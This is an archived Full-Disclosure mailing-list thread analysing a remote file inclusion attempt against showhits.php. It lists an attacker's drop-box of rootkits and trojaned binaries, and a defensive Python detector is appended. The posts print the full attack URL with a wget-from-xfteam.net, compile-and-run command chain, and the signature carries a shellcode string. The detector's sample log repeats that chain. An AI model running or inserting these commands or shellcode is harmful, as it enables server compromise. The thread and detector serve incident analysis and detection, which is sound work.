
Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1">
  <title></title>
</head>
<body>
I've attached a copy of the archive,&nbsp; I was able to retrieve it
apparently.<br>
It's sd's client code for his tty shell, looks like you've stumbled onto
someone's private warez<br>
repository.&nbsp; The root of xfteam.net is just full of fun stuff.<br>
<br>
<pre>      <a href="http://xfteam.net/">Parent Directory</a>    20-Nov-2003 16:14     -
[   ] <a href="http://xfteam.net/c4">c4</a>                  15-Nov-2003 10:49   19k
[DIR] <a href="http://xfteam.net/cgi-bin/">cgi-bin/</a>            20-Nov-2003 16:13     -
[   ] <a href="http://xfteam.net/cmd.jpg.php">cmd.jpg.php</a>         15-Nov-2003 10:49    1k
[TXT] <a href="http://xfteam.net/cmd.txt">cmd.txt</a>             15-Nov-2003 10:47    1k
[   ] <a href="http://xfteam.net/f">f</a>                   20-Nov-2003 13:01   28k
[   ] <a href="http://xfteam.net/fedor.c">fedor.c</a>             15-Nov-2003 10:47    5k
[DIR] <a href="http://xfteam.net/forum/">forum/</a>              04-Nov-2003 22:05     -
[IMG] <a href="http://xfteam.net/google.jpg">google.jpg</a>          19-Nov-2003 19:56  106k
[IMG] <a href="http://xfteam.net/hax.gif">hax.gif</a>             19-Nov-2003 23:38    1k
[   ] <a href="http://xfteam.net/iomash.c">iomash.c</a>            16-Nov-2003 16:30    2k
[   ] <a href="http://xfteam.net/kmod">kmod</a>                15-Nov-2003 10:47   17k
[DIR] <a href="http://xfteam.net/mail/">mail/</a>               20-Nov-2003 16:13     -
[   ] <a href="http://xfteam.net/putty.exe">putty.exe</a>           19-Nov-2003 12:36  220k
[   ] <a href="http://xfteam.net/remote.php">remote.php</a>          15-Nov-2003 10:49   87k
[TXT] <a href="http://xfteam.net/strings.txt">strings.txt</a>         15-Nov-2003 10:44    3k
[   ] <a href="http://xfteam.net/telnetd">telnetd</a>             16-Nov-2003 16:29  167k

I'm of the opinion this is someone's drop box; they drop off code they are going
to later download and compile on a target machine from here.
The file c4 is a SucKIT variant, also by SD, very popular with the Linux kids.
kmod is ptrace-kmod.c in ELF.  telnetd is what you would expect:
it's a trojaned telnetd binary.  These binaries also appear to be infected with
an RST variant:
<a class="moz-txt-link-freetext"
href="http://dump.cryptobeacon.net/papers/RST-Variant%20Analysis.txt">http://dump.cryptobeacon.net/papers/RST-Variant%20Analysis.txt</a>,
I wonder if your attacker knows this or not.  If not I feel really bad
for anyone he's attacked.  Who says unix virii aren't effective?

yawn.

</pre>
<pre cols="72" class="moz-signature">char 
sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80";
</pre>
<br>
<br>
Dan wrote:<br>
<blockquote type="cite" cite="midhounna.m4fx1i@vmail.lockedbox.net">
  <pre wrap="">Hi,
Our Snort picked up an interesting attempt to download, compile and execute.
Noting also the fact that the sub dir it's attempting to access has not been
there for over 4 months (/logjam/)?

Has anyone actually seen what this fedor.c is? I have done some googling but
it comes up blank.

Has anyone else noticed this kind of request recently?

Is it just me or is xfteam.net not resolving anyway?

Original HTTP request:
GET /logjam/showhits.php?
rel_path=<a class="moz-txt-link-freetext"
href="http://xfteam.net/cmd.txt?&amp;cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&amp;cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f">http://xfteam.net/cmd.txt?&amp;cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&amp;cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f</a>

Breaking this down we get (twice):
uname -a
cd /tmp
wget <a class="moz-txt-link-freetext"
href="http://xfteam.net/fedor.c">http://xfteam.net/fedor.c</a>
gcc -o f fedor.c
./f


Regards,
Daniel.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: <a class="moz-txt-link-freetext"
href="http://lists.netsys.com/full-disclosure-charter.html">http://lists.netsys.com/full-disclosure-charter.html</a>
  </pre>
</blockquote>
</body>
</html>

Attachment: xfteam.net.tar.gz
Description: application/gzip
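
Detection logic for the request Dan breaks down above, written here as an added example (not code from either post): it decodes the query string, flags a parameter whose value is a remote URL (the remote file inclusion into showhits.php) and flags a cmd= value whose commands form a fetch, compile, execute chain in that order. The access-log line is constructed for the example; the client IP and timestamp are made up and the cmd= chain appears once rather than twice.

```python
import re
from urllib.parse import unquote
# Constructed Apache access-log line reproducing the request quoted in Dan's
# post (one copy of the cmd= chain); client IP and timestamp are made up.
SAMPLE_LOG = (
    '203.0.113.7 - - [20/Nov/2003:16:20:01 +0000] "GET /logjam/showhits.php?'
    'rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;'
    'wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f HTTP/1.0" '
    '200 512 "-" "Mozilla/4.0"'
)
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
ABS_URL_RE = re.compile(r"^(https?|ftp)://", re.I)
STAGE = {"wget": "fetch", "curl": "fetch", "lynx": "fetch",
         "gcc": "compile", "cc": "compile", "g++": "compile"}
DROP_CHAIN = ("fetch", "compile", "exec")  # the order Dan's breakdown shows

def split_query(target):
    """Decode the query into [(name, value)]; split on '&' only so ';' chains survive."""
    _path, _, query = target.partition("?")
    params = []
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        params.append((unquote(name), unquote(value)))
    return params

def chain_stages(chain):
    """Map each ';'-separated command to a stage; uname, cd etc. drop out."""
    stages = []
    for cmd in filter(None, (c.strip() for c in chain.split(";"))):
        head = cmd.split()[0]
        if head.startswith("./"):
            stages.append("exec")
        elif head in STAGE:
            stages.append(STAGE[head])
    return stages

def analyze_request(log_line):
    """Return findings for one access-log line; [] when nothing matches."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    findings = []
    for name, value in split_query(m.group("target")):
        if ABS_URL_RE.match(value):  # parameter carrying a remote URL: RFI
            findings.append(("rfi", name, value.rstrip("?")))
        stages = iter(chain_stages(value))
        if all(stage in stages for stage in DROP_CHAIN):  # subsequence, in order
            findings.append(("drop_compile_exec", name, value))
    return findings
```

Splitting on `&` by hand matters here: older `urllib.parse.parse_qs` also split on `;`, which would break the injected chain into separate parameters and hide the pattern.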